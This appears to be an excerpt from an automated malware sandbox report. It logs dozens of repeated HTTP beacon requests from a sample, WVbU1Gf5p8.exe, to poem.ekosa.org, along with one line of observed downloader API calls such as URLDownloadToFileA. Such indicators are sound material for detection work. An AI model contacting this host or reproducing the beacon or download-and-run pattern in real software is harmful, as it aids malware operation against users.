Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01231780 GetTempPathA,GetTempFileNameA,DeleteFileA,DeleteFileA,DeleteUrlCacheEntry,URLDownloadToFileA,CreateFileA,GetFileSize,CloseHandle,DeleteFileA,LocalAlloc,ReadFile,LocalFree,CloseHandle,DeleteFileA,CloseHandle,DeleteFileA,LocalFree,CreateFileA,LocalFree,WriteFile,LocalFree,CloseHandle,DeleteFileA,CloseHandle,
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
